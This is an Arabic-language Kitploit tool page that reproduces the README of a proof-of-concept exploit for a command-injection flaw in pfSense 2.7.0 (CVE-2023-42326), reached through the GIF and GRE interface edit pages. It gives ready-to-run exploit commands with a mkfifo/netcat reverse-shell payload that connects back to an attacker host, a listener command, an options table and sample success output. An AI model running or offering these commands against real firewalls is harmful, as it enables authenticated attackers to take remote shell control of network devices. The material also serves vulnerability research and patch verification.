Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-42326 — هذا هو إثبات مفهوم بسيط لإظهار ثغرة حقن الأوامر في pfSense 2.7 (CVE-2023-42326) | Kitploit
أدوات/GitHubGitHub/bl4ckarch/cve-2023-42326
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubbl4ckarch/cve-2023-42326

CVE-2023-42326

هذا هو إثبات مفهوم بسيط لإظهار ثغرة حقن الأوامر في pfSense 2.7 (CVE-2023-42326)

عرض المستودع
438منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

pfSense 2.7.0 استغلال حقن الأوامر (CVE-2023-42326)

هذا البرنامج النصي بايثون هو إثبات المفهوم (PoC) لاستغلال ثغرة حقن الأوامر (CVE-2023-42326) في pfSense 2.7.0. تسمح هذه الثغرة للمهاجمين الموثقين بحقن وتنفيذ أوامر عشوائية عبر مكونات interfaces_gif_edit.php و interfaces_gre_edit.php.

الميزات

  • اختيار وضع الاستغلال (gif أو gre) لاختيار المكونات المعرضة للخطر.
  • إمكانية حقن الأوامر لتشغيل أوامر شيل عشوائية.
  • معالجة شيل عكسي Netcat مع إدارة تلقائية للخيوط.
  • وضع التصحيح لتحسين رؤية بيانات الطلب.

المتطلبات الأساسية

قبل تشغيل البرنامج النصي، تأكد من أن لديك:

  • تم تثبيت Python 3.x على نظامك.
  • تم تثبيت مكتبات Python المطلوبة:
    root@kitploit:~
    pip install requests beautifulsoup4 rich
    

الاستخدام

مثال أساسي (حقن الأوامر)

هذا الأمر يحقن أمر شيل يقوم بإنشاء شيل عكسي إلى جهازك:

root@kitploit:~
python3 exploit.py -u "admin" -p "pfsense" --mode "gif" -t "http://10.101.1.1" -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.151.1 80 > /tmp/f &"
  • -u: اسم المستخدم لتسجيل الدخول كمسؤول pfSense.
  • -p: كلمة المرور لتسجيل الدخول كمسؤول pfSense.
  • --mode: وضع الاستغلال (إما gif أو gre).
  • -t: عنوان URL المستهدف لـ pfSense.
  • -c: أمر الشيل الذي سيتم حقنه.
  • -d: (اختياري) تفعيل وضع التصحيح لرؤية بيانات الاستجابة الخام.

مثال الشيل العكسي

تأكد من وجود مستمع Netcat يعمل على جهازك:

root@kitploit:~
nc -lvnp 80

ثم قم بتشغيل البرنامج النصي بأمر شيل عكسي مثل هذا:

root@kitploit:~
python3 exploit.py -u "admin" -p "pfsense" --mode "gif" -t "http://10.101.1.1" -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.151.1 80 > /tmp/f &"  --insecure(for https without valid ssl)

صور GIF توضيحية

  1. تسجيل الدخول إلى pfSense واستغلال واجهة GIF

    Demo 1 - GIF Interface

  2. تنفيذ شيل عكسي

    Demo 2 - Reverse Shell

خيارات البرنامج النصي

المعاملالوصف
-uاسم المستخدم لتسجيل الدخول كمسؤول pfSense.
-pكلمة المرور لتسجيل الدخول كمسؤول pfSense.
-tعنوان URL/IP المستهدف لـ pfSense (مثل http://10.101.1.1).
--modeوضع الاستغلال: gif (لـ interfaces_gif_edit.php) أو gre.
-cالأمر الذي سيتم حقنه في المكون المعرض للخطر.
-dاختياري. تفعيل وضع التصحيح لطباعة بيانات الاستجابة للرؤية.

مثال على الإخراج

عندما يتم تشغيل الاستغلال بنجاح، يجب أن ترى إخراجًا مشابهًا لهذا:

root@kitploit:~
██████╗ ███████╗██████╗ ██╗    ██╗███╗   ██╗███╗   ███╗███████╗
██╔══██╗██╔════╝██╔══██╗██║    ██║████╗  ██║████╗ ████║██╔════╝
██████╔╝█████╗  ██████╔╝██║ █╗ ██║██╔██╗ ██║██╔████╔██║█████╗  
██╔═══╝ ██╔══╝  ██╔═══╝ ██║███╗██║██║╚██╗██║██║╚██╔╝██║██╔══╝  
██║     ██║     ██║     ╚███╔███╔╝██║ ╚████║██║ ╚═╝ ██║███████╗
╚═╝     ╚═╝     ╚═╝      ╚══╝╚══╝ ╚═╝  ╚═══╝╚═╝     ╚═╝╚══════╝

Done with ❤️  by @bl4ckarch                                                            
[2024-10-24 03:57:59] [SUCCESS] Target http://10.101.1.1 is reachable
[2024-10-24 03:57:59] [INFO] Fetching CSRF token from: http://10.101.1.1/
[2024-10-24 03:57:59] [SUCCESS] CSRF token extracted successfully
[2024-10-24 03:57:59] [INFO] Sending GIF exploit request to http://10.101.1.1/interfaces_gif_edit.php
[2024-10-24 03:57:59] [SUCCESS] GIF Exploit sent successfully

ملاحظات

  • متطلبات الصلاحية: يجب أن يكون لديك بيانات اعتماد مسؤول صالحة لمثيل pfSense.
  • النظام المستهدف: هذا الاستغلال خاص بـ pfSense 2.7.0.
  • الشيل العكسي: تأكد من أن إعدادات جدار الحماية تسمح بالاتصالات الواردة على المنفذ المحدد عند إعداد شيل عكسي.

وضع التصحيح

إذا كنت ترغب في رؤية المزيد من التفاصيل حول الطلبات المرسلة، يمكنك تفعيل وضع التصحيح بإضافة -d إلى أمرك. سيقوم هذا بطباعة بيانات الاستجابة ومساعدتك في استكشاف أي مشكلات.

root@kitploit:~
python3 exploit.py -u "admin" -p 'pfsense' --mode 'gif' -t http://10.101.1.1 -c "your_command_here" -d --insecure(for https without valid ssl)

استكشاف الأخطاء وإصلاحها

  • تأكد من أن النظام المستهدف يمكن الوصول إليه.
  • تحقق مرة أخرى من بيانات الاعتماد المستخدمة لتسجيل الدخول.
  • استخدم العلم -d للحصول على تسجيل أكثر تفصيلاً إذا لزم الأمر.
تنزيل الأداة